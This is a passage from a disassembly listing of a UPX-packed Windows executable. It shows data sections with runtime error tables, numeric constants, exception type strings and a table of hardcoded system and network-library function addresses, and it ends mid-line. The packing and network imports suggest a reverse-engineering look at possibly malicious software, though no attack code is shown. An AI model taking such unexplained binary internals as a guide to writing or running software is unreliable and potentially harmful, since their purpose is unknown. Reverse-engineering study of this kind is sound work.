DATA XREF: sub_4235C9+Eo ; sub_4235C9+28r off_43D03C dd offset aR6002FloatingP ; DATA XREF: sub_4235C9+FCr ; sub_4235C9+12Dr ; "R6002\r\n- floating point not loaded\r\n" dd 8, 427B8Ch, 9, 427B60h, 0Ah, 427B3Ch, 10h, 427B10h dd 11h, 427AE0h, 12h, 427ABCh, 13h, 427A90h, 18h, 427A58h dd 19h, 427A30h, 1Ah, 4279F8h, 1Bh, 4279C0h, 1Ch, 427998h dd 78h, 427988h, 79h, 427978h, 7Ah, 427968h, 0FCh, 433F14h dd 0FFh, 427958h off_43D0C8 dd offset dword_4DBC80 ; DATA XREF: sub_4235C9+1Bo ; sub_423936+55o align 10h dd offset dword_4DBC80 dd 101h dword_43D0D8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423936+72o dd 1000h, 0 dword_43D0E8 dd 3 dup(0) ; DATA XREF: sub_41F58A+50o ; sub_420446+12o dd 2, 0FFFFFFFFh, 3 dup(0) dword_43D108 dd 3 dup(0) ; DATA XREF: sub_41F58A+58o ; sub_420446:loc_420464o dd 2, 0FFFFFFFFh, 7 dup(0) dword_43D138 dd 84h dup(0) ; DATA XREF: sub_423936+9Bo dword_43D348 dd 2 dup(0) ; DATA XREF: sub_423936+69o dword_43D350 dd 2694h ; DATA XREF: sub_420FC1+3r ; sub_421014+46r align 8 dword_43D358 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_4244ECo dword_43D370 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_424502o dword_43D388 dd 7080h ; DATA XREF: sub_422669+76r ; sub_4247EC+5Ew ... dword_43D38C dd 1 ; DATA XREF: sub_422669+98r ; sub_4247EC+8Bw ... dword_43D390 dd 0FFFFF1F0h ; DATA XREF: sub_422669:loc_42271Br ; sub_4247EC+94w ... dword_43D394 dd 545350h, 0Fh dup(0) ; DATA XREF: UPX0:off_43D414o dword_43D3D4 dd 544450h, 0Fh dup(0) ; DATA XREF: UPX0:off_43D418o off_43D414 dd offset dword_43D394 ; DATA XREF: sub_4247EC+BAr ; sub_4247EC+D9r ... off_43D418 dd offset dword_43D3D4 ; DATA XREF: sub_4247EC+F4r ; sub_4247EC+11Br ... align 10h dword_43D420 dd 0FFFFFFFFh ; DATA XREF: sub_4247EC+1Dw ; sub_424A4A+1Er ... dword_43D424 dd 0 ; DATA XREF: sub_424A4A:loc_424B7Er ; sub_424BF6+BFw dword_43D428 dd 0 ; DATA XREF: sub_424A4A+192r ; sub_424BF6+E0w align 10h dword_43D430 dd 0FFFFFFFFh ; DATA XREF: sub_4247EC+17w ; sub_424A4A+26r ... dword_43D434 dd 0 ; DATA XREF: sub_424A4A+13Ar ; sub_424BF6+EAw ... dword_43D438 dd 0 ; DATA XREF: sub_424A4A+1A1r ; sub_424BF6+23r ... dword_43D43C dd 0FFFFFFFFh ; DATA XREF: sub_424BF6+84r dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h dd 14Eh dword_43D46C dd 16Dh ; DATA XREF: sub_422669+2Ar ; sub_424BF6+2Er ... dword_43D470 dd 0FFFFFFFFh ; DATA XREF: sub_424BF6:loc_424C82r dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh dd 14Dh, 16Ch, 0 dword_43D4A8 dd 2 dup(0) ; DATA XREF: sub_425DDA+7o dd 4002A000h, 2 dup(0) dd 4005C800h, 2 dup(0) dd 4008FA00h, 2 dup(0) dd 400C9C40h, 2 dup(0) ; --------------------------------------------------------------------------- push eax retn ; --------------------------------------------------------------------------- dw 400Fh dd 2 dup(0) dd 4012F424h, 0 dd 80000000h, 40169896h, 0 dd 20000000h, 4019BEBCh, 0 dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch dd 52028A20h, 7525C460h, 0 dword_43D608 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h ; DATA XREF: sub_425DDA+1Bo dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h dd 4C8D2CEh, 0AD8A6DDh off_43D764 dd offset off_427D60 ; DATA XREF: UPX0:00427F3Co ; UPX0:00428028o dd 0 a_?avexception@ db '.?AVexception@@',0 off_43D77C dd offset off_427D60 ; DATA XREF: UPX0:off_427DF0o ; UPX0:00427E30o ... dd 0 a_?avlogic_erro db '.?AVlogic_error@std@@',0 align 4 off_43D79C dd offset off_427D60 ; DATA XREF: UPX0:off_427E38o ; UPX0:00427E7Co ... dd 0 a_?avout_of_ran db '.?AVout_of_range@std@@',0 align 4 off_43D7BC dd offset off_427D60 ; DATA XREF: UPX0:off_427E84o ; UPX0:00427EC8o ... dd 0 a_?avlength_err db '.?AVlength_error@std@@',0 align 10h off_43D7E0 dd offset off_427D60 ; DATA XREF: UPX0:off_427ED0o ; UPX0:00427F0Co align 8 a_?avtype_info@ db '.?AVtype_info@@',0 dd offset sub_42470C align 10h dword_43D800 dd 2 dup(0) ; DATA XREF: sub_40111D+C8o byte_43D808 db 0 ; DATA XREF: sub_40111D+62o ; sub_401221+24Do ... align 10h dword_43D810 dd 0 ; DATA XREF: sub_401221+38Fo ; sub_401ACD+B08o ... dd 5 dup(0) dword_43D828 dd 0 ; DATA XREF: sub_401ACD+B64r ; sub_4150B5+60r dd 2D9h dup(0) dword_43E390 dd 0 ; DATA XREF: sub_401ACD+5E63r ; sub_401ACD+5F40r ... dd 7Fh dup(0) dword_43E590 dd 0 ; DATA XREF: sub_40B0F7+41w ; sub_40B232+40w ... dword_43E594 dd 0 ; DATA XREF: sub_40B0F7+47w ; sub_40B232+46w ... dword_43E598 dd 0 ; DATA XREF: sub_40B0F7+52w ; sub_40B232+3Ar ... dword_43E59C dd 0 ; DATA XREF: sub_40111D+Cr ; sub_4017ED+B9w ... dword_43E5A0 dd 0 ; DATA XREF: sub_40B232+75r ; sub_40B413+2Aw ... dword_43E5A4 dd 0 ; DATA XREF: sub_401221+3DEw ; sub_401221+456w ... byte_43E5A8 db 0 ; DATA XREF: sub_4017ED+91o ; sub_401ACD+5DA8r ... align 4 dd 1C69h dup(0) dword_445750 dd 473Ch dup(0) ; DATA XREF: UPX0:off_433E54o db 0 byte_457441 db 3 dup(0) ; DATA XREF: UPX0:off_438BACo dd 17780h dup(0) db 0 byte_4B5245 db 3 dup(0) ; DATA XREF: UPX0:off_438A18o dd 3F6Eh dup(0) UPX0 ends ; Section 2. (virtual address 000C5000) ; Virtual size : 0001B000 ( 110592.) ; Section size in file : 0001B000 ( 110592.) ; Offset to raw data for section: 000C5000 ; Flags E0000040: Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 4C5000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_4C5000 dd 18E4h dup(0) ; DATA XREF: UPX1:004DF241o dword_4CB390 dd 0C515h ; DATA XREF: sub_40111D+FDw ; sub_40B0F7+13o ... dword_4CB394 dd 1Bh ; DATA XREF: sub_401221+3Dw ; sub_401ACD:loc_4044D8r ... dword_4CB398 dd 0 ; DATA XREF: sub_401221:loc_4016FFo dword_4CB39C dd 20h dup(0) ; DATA XREF: sub_401221+495o ; sub_401221+52Fo ... dword_4CB41C dd 10h dup(0) ; DATA XREF: sub_401221+4ABo dword_4CB45C dd 24h dup(0) ; DATA XREF: sub_401221+4C2o dword_4CB4EC dd 0 ; DATA XREF: sub_401221+4B6w ; sub_401221+546w ... dword_4CB4F0 dd 0 ; DATA XREF: sub_401221+4D5w align 10h byte_4CB500 db 0 ; DATA XREF: sub_401955+28r ; sub_401955+30o align 4 dword_4CB504 dd 0 ; DATA XREF: sub_401221+4E3w ; sub_401221+4FAr ... dword_4CB508 dd 0 ; DATA XREF: sub_401221+49Aw ; sub_401ACD+8BEr dword_4CB50C dd 0 ; DATA XREF: sub_401ACD+7DC0o ; sub_40C9A5+13o ... dword_4CB510 dd 77C72C6Bh ; DATA XREF: sub_409B13+4A7w ; sub_409B13+4EBr ... dword_4CB514 dd 77EBA994h ; DATA XREF: sub_409B13+65w ; sub_4196BD+166r dword_4CB518 dd 7622A3F4h ; DATA XREF: sub_409B13+80Bw ; sub_409B13+880r ... dword_4CB51C dd 71C45229h ; DATA XREF: sub_409B13+9D8w ; sub_409B13+A43r ... dword_4CB520 dd 71C24870h ; DATA XREF: sub_409B13+98Aw ; sub_409B13+A13r ... dword_4CB524 dd 77C71BB0h ; DATA XREF: sub_409B13+48Dw ; sub_409B13+4DBr ... dword_4CB528 dd 77D4808Bh ; DATA XREF: sub_409B13+213w ; sub_409B13+234r ... dword_4CB52C dd 71C4502Ch ; DATA XREF: sub_409B13+9CBw ; sub_409B13+A3Br ... dword_4CB530 dd 77DE801Bh ; DATA XREF: sub_409B13+372w ; sub_409B13+3C7r ... dword_4CB534 dd 77DDACABh ; DATA XREF: sub_409B13+40Fw ; sub_41AA43+11Er dword_4CB538 dd 77DE8075h ; DATA XREF: sub_409B13+37Fw ; sub_409B13+3CFr ... dword_4CB53C dd 77DD7496h ; DATA XREF: sub_409B13+3C0w ; sub_418C8F+ADr dword_4CB540 dd 71AB1B7Bh ; DATA XREF: sub_409B13+55Aw ; sub_40F0D6+115r ... dword_4CB544 dd 77E686CCh ; DATA XREF: sub_409B13+72w ; sub_409B13+D2r ... dword_4CB548 dd 71C2498Bh ; DATA XREF: sub_409B13+97Dw ; sub_409B13+A06r ... dword_4CB54C dd 77DDAB2Fh ; DATA XREF: sub_409B13+3A6w ; sub_409B13+3E7r ... dword_4CB550 dd 7620E8C3h ; DATA XREF: sub_409B13+859w ; sub_409B13+8ACr ... dword_4CB554 dd 77DD23D7h ; DATA XREF: sub_409B13+2A5w ; sub_409B13+2F0r ... dword_4CB558 dd 76214750h ; DATA XREF: sub_409B13+84Cw ; sub_409B13+8A4r ... dword_4CB55C dd 77E6D75Bh ; DATA XREF: sub_409B13+B3w dword_4CB560 dd 7620BD61h ; DATA XREF: sub_409B13+866w ; sub_409B13+8B4r ... dword_4CB564 dd 71AB60C9h ; DATA XREF: sub_409B13+54Dw ; sub_409B13+6D0r ... dword_4CB568 dd 77EBA6E9h ; DATA XREF: sub_409B13+58w ; sub_409B13+CAr ... dword_4CB56C dd 76D62A58h ; DATA XREF: sub_409B13+934w ; sub_413285+11Ar dword_4CB570 dd 76F36EAAh ; DATA XREF: sub_401ACD:loc_403F26r ; sub_409B13+A95w ... dword_4CB574 dd 77E802FCh ; DATA XREF: sub_409B13+A6w ; sub_409B13+F2r dword_4CB578 dd 77C75455h ; DATA XREF: sub_409B13+480w ; sub_409B13+4D3r ... dword_4CB57C dd 71AB12A7h ; DATA XREF: sub_409B13+5F6w ; sub_40BFA4+20r ... dword_4CB580 dd 71C574FAh ; DATA XREF: sub_409B13+9BEw ; sub_409B13+A33r dword_4CB584 dd 71AB1746h ; DATA XREF: sub_409B13+5E9w ; sub_409B13+754r ... dword_4CB588 dd 71C21CA3h ; DATA XREF: sub_409B13+A0Cw dword_4CB58C dd 71B28D0Dh ; DATA XREF: sub_409B13+B50w dword_4CB590 dd 762211EFh ; DATA XREF: sub_409B13+7FEw ; sub_409B13+86Dr ... dword_4CB594 dd 77D902E3h ; DATA XREF: sub_409B13+1B3w ; sub_40B2F2+3Do ... dword_4CB598 dd 71C2FA86h ; DATA XREF: sub_409B13+997w ; sub_409B13+A1Br ... dword_4CB59C dd 77DE1291h ; DATA XREF: sub_409B13+38Cw ; sub_409B13+3D7r ... dword_4CB5A0 dd 77E2C1B3h ; DATA XREF: sub_409B13+399w ; sub_409B13+3DFr ... dword_4CB5A4 dd 73B81E3Bh ; DATA XREF: sub_409B13+C85w ; sub_409B13+C8Cr ... dword_4CB5A8 dd 71ABF628h ; DATA XREF: sub_409B13+6ACw ; sub_4107C0+D0r dword_4CB5AC dd 71AB1836h ; DATA XREF: sub_40111D+1Dr ; sub_40111D+23r ... dword_4CB5B0 dd 77C72889h ; DATA XREF: sub_409B13+4B4w ; sub_4153BD+207r dword_4CB5B4 dd 71C453F8h ; DATA XREF: sub_409B13+9E5w ; sub_409B13+A4Br ... dword_4CB5B8 dd 77DD5C55h ; DATA XREF: sub_401000+51r ; sub_409B13+2B2w ... dword_4CB5BC dd 77E96645h ; DATA XREF: sub_409B13+7Fw ; sub_409B13+DAr ... dword_4CB5C0 dd 77428B97h ; DATA XREF: sub_401ACD+5912r ; sub_401ACD+79CFr ... dword_4CB5C4 dd 71AB41DAh ; DATA XREF: sub_401221+8Cr ; sub_401ACD+5118r ... dword_4CB5C8 dd 762059A3h ; DATA XREF: sub_409B13+825w ; sub_409B13+890r ... dword_4CB5CC dd 71C4A1B4h ; DATA XREF: sub_409B13+9A4w ; sub_409B13+A23r dword_4CB5D0 dd 1F7CD214h ; DATA XREF: sub_409B13+C0Ew ; sub_409B13+C3Fr dword_4CB5D4 dd 77E09134h ; DATA XREF: sub_409B13+2CCw ; sub_4184E2+47r dword_4CB5D8 dd 77D4456Bh ; DATA XREF: sub_409B13+22Dw ; sub_411CF5+40r ... dword_4CB5DC dd 76D629BBh ; DATA XREF: sub_409B13+91Aw ; sub_409B13+92Er ... dword_4CB5E0 dd 1F7B9D96h ; DATA XREF: sub_409B13+C28w dword_4CB5E4 dd 77E09070h ; DATA XREF: sub_409B13+2D9w ; sub_4184E2+4Fr dword_4CB5E8 dd 71AB1740h ; DATA XREF: sub_409B13+574w ; sub_409B13+6E8r ... dword_4CB5EC dd 7620AFB6h ; DATA XREF: sub_409B13+83Fw ; sub_409B13+873r dword_4CB5F0 dd 77D5C13Ah ; DATA XREF: sub_409B13+220w ; sub_409B13+23Cr ... dword_4CB5F4 dd 77D45B19h ; DATA XREF: sub_409B13+172w ; sub_409B13+1C2r ... dword_4CB5F8 dd 71AB157Eh ; DATA XREF: sub_401ACD+1E31r ; sub_401ACD+5AC8r ... dword_4CB5FC dd 71AB3E5Dh ; DATA XREF: sub_4017ED+C4r ; sub_401ACD+51A2r ... dword_4CB600 dd 71AB14DCh ; DATA XREF: sub_409B13+567w ; sub_409B13+6DCr ... dword_4CB604 dd 0CC0004h ; DATA XREF: sub_409B13+8DBw ; sub_409B13:loc_40A40Cw ... dword_4CB608 dd 77DD590Bh ; DATA XREF: sub_401000+26r ; sub_409B13+28Bw ... dword_4CB60C dd 71ABD755h ; DATA XREF: sub_401ACD+795Ar ; sub_409B13+69Fw ... dword_4CB610 dd 77DF7311h ; DATA XREF: sub_409B13+32Dw ; sub_409B13+341r ... dword_4CB614 dd 77DDA2AFh ; DATA XREF: sub_409B13+3B3w ; sub_409B13+3EFr ... dword_4CB618 dd 1F7CD927h ; DATA XREF: sub_409B13+C01w ; sub_409B13+C37r dword_4CB61C dd 76206853h ; DATA XREF: sub_409B13+818w ; sub_409B13+888r ... dword_4CB620 dd 77D4932Ch ; DATA XREF: sub_409B13+206w ; sub_409B13+227r ... dword_4CB624 dd 77D5E310h ; DATA XREF: sub_409B13+18Cw ; sub_409B13+1D2r ... dword_4CB628 dd 76206B7Fh ; DATA XREF: sub_409B13+832w ; sub_409B13+898r ... dword_4CB62C dd 71AB1444h ; DATA XREF: sub_409B13+624w ; sub_409B13+774r ... dword_4CB630 dd 77DD189Ah ; DATA XREF: sub_401000+5Ar ; sub_409B13+2BFw ... dword_4CB634 dd 71AB3F8Dh ; DATA XREF: sub_409B13+66Bw ; sub_409B13+79Cr ... dword_4CB638 dd 77DD5D20h ; DATA XREF: sub_409B13+320w ; sub_409B13+334r ... dword_4CB63C dd 71AB1890h ; DATA XREF: sub_409B13+644w ; sub_409B13+784r ... dword_4CB640 dd 77C76B34h ; DATA XREF: sub_409B13+44Cw ; sub_409B13+4AEr ... dword_4CB644 dd 77D5E38Ch ; DATA XREF: sub_409B13+199w ; sub_409B13+1DAr ... dword_4CB648 dd 77DDA20Bh ; DATA XREF: sub_409B13+365w ; sub_409B13+3BAr ... dword_4CB64C dd 76F36EEBh ; DATA XREF: sub_409B13+AA2w dword_4CB650 dd 71AB12A7h ; DATA XREF: sub_409B13+5DCw ; sub_409B13+748r ... dword_4CB654 dd 71AB1746h ; DATA XREF: sub_4017ED+3Er ; sub_401ACD+5154r ... dword_4CB658 dd 77EBA595h ; DATA XREF: sub_409B13+4Bw ; sub_409B13+C2r ... dword_4CB65C dd 77C7531Dh ; DATA XREF: sub_409B13+473w ; sub_409B13+4CBr ... dword_4CB660 dd 77D4BDCAh ; DATA XREF: sub_409B13+165w ; sub_409B13+1BAr ... dword_4CB664 dd 71C3516Ah ; DATA XREF: sub_409B13+9FFw ; sub_409B13+A5Br ... dword_4CB668 dd 71AB32CAh ; DATA XREF: sub_409B13+685w ; sub_409B13+7ACr ... dword_4CB66C dd 71AB5690h ; DATA XREF: sub_401955+D1r ; sub_401ACD+51B7r ... dword_4CB670 dd 1F7CB8F8h ; DATA XREF: sub_409B13+C1Bw ; sub_409B13+C47r dword_4CB674 dd 77EBB1E7h ; DATA XREF: sub_409B13+3Ew ; sub_409B13+BAr ... dword_4CB678 dd 77DD59F0h ; DATA XREF: sub_401000+45r ; sub_409B13+298w ... dword_4CB67C dd 71AB5DE2h ; DATA XREF: sub_409B13+651w ; sub_409B13+78Cr ... dword_4CB680 dd 71AB3ECEh ; DATA XREF: sub_409B13+637w ; sub_409B13+77Cr ... dword_4CB684 dd 73B81B0Fh ; DATA XREF: sub_401ACD+73BAr ; sub_409B13+C92w dword_4CB688 dd 76204E4Dh ; DATA XREF: sub_409B13+879w ; sub_4163FA+4DCr ... dword_4CB68C dd 0 ; DATA XREF: sub_409B13+112w dword_4CB690 dd 1F7D886Ah ; DATA XREF: sub_409B13+BE7w ; sub_409B13+C22r dword_4CB694 dd 71AB12F8h ; DATA XREF: sub_401ACD+2FE5r ; sub_401ACD+5F99r ... dword_4CB698 dd 77C76551h ; DATA XREF: sub_409B13+459w ; sub_409B13+4BBr ... dword_4CB69C dd 77C729E2h ; DATA XREF: sub_409B13+49Aw ; sub_409B13+4E3r ... dword_4CB6A0 dd 77C7212Fh ; DATA XREF: sub_409B13+466w ; sub_409B13+4C3r ... dword_4CB6A4 dd 71AB1AF4h ; DATA XREF: sub_401955+89r ; sub_401ACD+51D4r ... dword_4CB6A8 dd 77D5E303h ; DATA XREF: sub_409B13+1A6w ; sub_409B13+1E2r ... dword_4CB6AC dd 71C4576Ch ; DATA XREF: sub_409B13+9F2w ; sub_409B13+A53r ... dword_4CB6B0 dd 77D4702Fh ; DATA XREF: sub_409B13+158w ; sub_409B13+1ADr ... dword_4CB6B4 dd 77E6C0E3h ; DATA XREF: sub_409B13+8Cw ; sub_409B13+E2r ... dword_4CB6B8 dd 71AB1ED3h ; DATA XREF: sub_409B13+610w ; sub_409B13+764r ... dword_4CB6BC dd 71B2A381h ; DATA XREF: sub_409B13+B43w ; sub_409B13+B5Fr dword_4CB6C0 dd 77DDA595h ; DATA XREF: sub_409B13+33Aw ; sub_419652+55r dword_4CB6C4 dd 77DD22EAh ; DATA XREF: sub_409B13+27Ew ; sub_409B13+2D3r ... dword_4CB6C8 dd 773F97B0h ; DATA XREF: sub_409B13+BAAw dword_4CB6CC dd 76D67A29h ; DATA XREF: sub_409B13+AECw ; sub_40AB32+CEr dword_4CB6D0 dd 76D674FAh ; DATA XREF: sub_409B13+ADFw ; sub_409B13+AE6r ... dword_4CB6D4 dd 71AB3C22h ; DATA XREF: sub_4017ED+A6r ; sub_401ACD+5133r ... dword_4CB6D8 dd 71AB2BBFh ; DATA XREF: sub_401ACD+5125r ; sub_401ACD+7981r ... dword_4CB6DC dd 1F7BA3A9h ; DATA XREF: sub_409B13+BF4w ; sub_409B13+C2Fr dword_4CB6E0 dd 71AB401Ch ; DATA XREF: sub_401ACD+1E57r ; sub_401ACD+5AEEr ... dword_4CB6E4 dd 71C214BAh ; DATA XREF: sub_409B13+9B1w ; sub_409B13+A2Br ... dword_4CB6E8 dd 71AB868Dh ; DATA XREF: sub_409B13+65Ew ; sub_409B13+794r ... dword_4CB6EC dd 71AB1A6Dh ; DATA XREF: sub_40111D+12r ; sub_4017ED+D0r ... dword_4CB6F0 dd 71AB155Ah ; DATA XREF: sub_409B13+59Bw ; sub_409B13+70Cr ... dword_4CB6F4 dd 71B22C25h ; DATA XREF: sub_409B13+B36w ; sub_409B13+B57r dword_4CB6F8 dd 71AB5A01h ; DATA XREF: sub_409B13+540w ; sub_409B13+6C4r ... dword_4CB6FC dd 71B2ACCBh ; DATA XREF: sub_409B13+B29w ; sub_409B13+B4Ar dword_4CB700 dd 77E78C17h ; DATA XREF: sub_401221+52r ; sub_409B13+31w ... dword_4CB704 dd 77D49A11h ; DATA XREF: sub_409B13+17Fw ; sub_409B13+1CAr ... dd 0 dword_4CB70C dd 76D62A37h ; DATA XREF: sub_409B13+927w ; sub_409B13+93Br ... dword_4CB710 dd 77E6CBF9h ; DATA XREF: sub_409B13+99w ; sub_409B13+EAr ... dword_4CB714 dd 0 ; DATA XREF: sub_409B13:loc_409C11w ; sub_409B13+12Bw ... dword_4CB718 dd 0 ; DATA XREF: sub_409B13+126w ; sub_40A7CF+1Cr dword_4CB71C dd 0 ; DATA XREF: sub_409B13:loc_409D01w ; sub_409B13:loc_409D68w ... dword_4CB720 dd 0 ; DATA XREF: sub_409B13+250w ; sub_40A7CF+50r dword_4CB724 dd 0 ; DATA XREF: sub_401221+349r ; sub_401ACD+4568r ... dword_4CB728 dd 0 ; DATA XREF: sub_409B13+41Ew ; sub_40A7CF+84r dword_4CB72C dd 0 ; DATA XREF: sub_409B13:loc_40A017w ; sub_40A7CF:loc_40A87Fr dword_4CB730 dd 0 ; DATA XREF: sub_409B13+4FFw ; sub_40A7CF+B8r dword_4CB734 dd 0 ; DATA XREF: sub_409B13:loc_40A2E8w ; sub_40A7CF:loc_40A8B3r dword_4CB738 dd 0 ; DATA XREF: sub_409B13+7D0w ; sub_40A7CF+ECr dword_4CB73C dd 0 ; DATA XREF: sub_409B13:loc_40A3D3w ; sub_409B13+8EFw ... dword_4CB740 dd 0 ; DATA XREF: sub_409B13+8EAw ; sub_40A7CF+120r dword_4CB744 dd 0 ; DATA XREF: sub_401ACD:loc_406F18r ; sub_409B13:loc_40A467w ... dword_4CB748 dd 0 ; DATA XREF: sub_409B13+94Fw ; sub_40A7CF+154r dword_4CB74C dd 0 ; DATA XREF: sub_401ACD+4570r ; sub_409B13:loc_40A583w ... dword_4CB750 dd 0 ; DATA XREF: sub_409B13+A6Bw ; sub_40A7CF+188r dword_4CB754 dd 0 ; DATA XREF: sub_409B13:loc_40A5CDw ; sub_40A7CF:loc_40A983r dword_4CB758 dd 0 ; DATA XREF: sub_409B13+AB5w ; sub_40A7CF+1BCr dword_4CB75C dd 0 ; DATA XREF: sub_409B13:loc_40A617w ; sub_40A7CF:loc_40A9B7r dword_4CB760 dd 0 ; DATA XREF: sub_409B13+AFFw ; sub_40A7CF+1F0r dword_4CB764 dd 0 ; DATA XREF: sub_409B13:loc_40A68Bw ; sub_40A7CF:loc_40A9EBr dword_4CB768 dd 0 ; DATA XREF: sub_409B13+B73w ; sub_40A7CF+224r dword_4CB76C dd 0 ; DATA XREF: sub_409B13:loc_40A6D5w ; sub_40A7CF:loc_40AA1Fr dword_4CB770 dd 0 ; DATA XREF: sub_409B13+BBDw ; sub_40A7CF+258r dword_4CB774 dd 0 ; DATA XREF: sub_409B13:loc_40A773w ; sub_40A7CF:loc_40AA53r dword_4CB778 dd 0 ; DATA XREF: sub_409B13+C5Bw ; sub_40A7CF+28Cr dword_4CB77C dd 0 ; DATA XREF: sub_409B13:loc_40A7BDw ; sub_40A7CF:loc_40AA87r dword_4CB780 dd 0 ; DATA XREF: sub_409B13+CA5w ; sub_40A7CF+2C0r dword_4CB784 dd 7 dup(0) ; DATA XREF: sub_40AC10+32o dword_4CB7A0 dd 0 ; DATA XREF: sub_40BA57+18r ; sub_40BFEC+92w ... dword_4CB7A4 dd 0 ; DATA XREF: sub_40C125+4Dr ; sub_40C33D+D9w ... dd 7FEh dup(0) dword_4CD7A0 dd 6 dup(0) ; DATA XREF: sub_40C125+D2o ; sub_40C125+13Bo ... dword_4CD7B8 dd 0 ; DATA XREF: sub_40BACE+2C4w ; sub_40BACE+348o dword_4CD7BC dd 0 ; DATA XREF: sub_40BACE+33Ew ; sub_40BACE+35Ar dword_4CD7C0 dd 0 ; DATA XREF: sub_40BACE+2CFw dword_4CD7C4 dd 0 ; DATA XREF: sub_40BACE+2B9w ; sub_40BACE:loc_40BDE3r dword_4CD7C8 dd 20h dup(0) ; DATA XREF: sub_40BACE+2E2o ; sub_40BACE+302o dword_4CD848 dd 0 ; DATA XREF: sub_40BACE+2D5w dword_4CD84C dd 0 ; DATA XREF: sub_40BACE+2EFw ; sub_40BACE+30Fw dword_4CD850 dd 0 ; DATA XREF: sub_40BACE:loc_40BE3Er align 8 dword_4CD858 dd 0 ; DATA XREF: sub_40BACE+82w ; sub_40BACE+101o dword_4CD85C dd 41h dup(0) ; DATA XREF: sub_40BACE+41o dword_4CD960 dd 41h dup(0) ; DATA XREF: sub_40BACE+69o dword_4CDA64 dd 0 ; DATA XREF: sub_40BACE+F7w ; sub_40BACE+113r dword_4CDA68 dd 0 ; DATA XREF: sub_40BACE+52w dword_4CDA6C dd 0 ; DATA XREF: sub_40BACE+4Dw ; sub_40BACE+D4r dword_4CDA70 dd 20h dup(0) ; DATA XREF: sub_40BACE+9Ao ; sub_40BACE+BAo dword_4CDAF0 dd 0 ; DATA XREF: sub_40BACE+8Fw dword_4CDAF4 dd 0 ; DATA XREF: sub_40BACE+A7w ; sub_40BACE+C7w dword_4CDAF8 dd 0 ; DATA XREF: sub_40BACE:loc_40BBF7r align 10h dword_4CDB00 dd 0 ; DATA XREF: sub_40BACE+1A5w ; sub_40BACE+225o dword_4CDB04 dd 41h dup(0) ; DATA XREF: sub_40BACE+167o dword_4CDC08 dd 41h dup(0) ; DATA XREF: sub_40BACE+18Co dword_4CDD0C dd 0 ; DATA XREF: sub_40BACE+21Bw ; sub_40BACE+237r dword_4CDD10 dd 0 ; DATA XREF: sub_40BACE+17Aw dword_4CDD14 dd 0 ; DATA XREF: sub_40BACE+175w ; sub_40BACE+1F8r dword_4CDD18 dd 20h dup(0) ; DATA XREF: sub_40BACE+1BEo ; sub_40BACE+1DEo dword_4CDD98 dd 0 ; DATA XREF: sub_40BACE+1B1w dword_4CDD9C dd 0 ; DATA XREF: sub_40BACE+1CBw ; sub_40BACE+1EBw dword_4CDDA0 dd 0 ; DATA XREF: sub_40BACE:loc_40BD1Br align 8 dword_4CDDA8 dd 0 ; DATA XREF: sub_40BACE+417w ; sub_40BACE+470o dword_4CDDAC dd 0A2h dup(0) ; DATA XREF: sub_40BACE+405o dword_4CE034 dd 41h dup(0) ; DATA XREF: sub_40BACE+3CFo dword_4CE138 dd 0 ; DATA XREF: sub_40BACE+3FCw ; sub_40BACE+423r align 10h dword_4CE140 dd 0 ; DATA XREF: sub_40BACE+466w ; sub_40BACE+482r dword_4CE144 dd 0 ; DATA XREF: sub_40BACE+429w dword_4CE148 dd 0 ; DATA 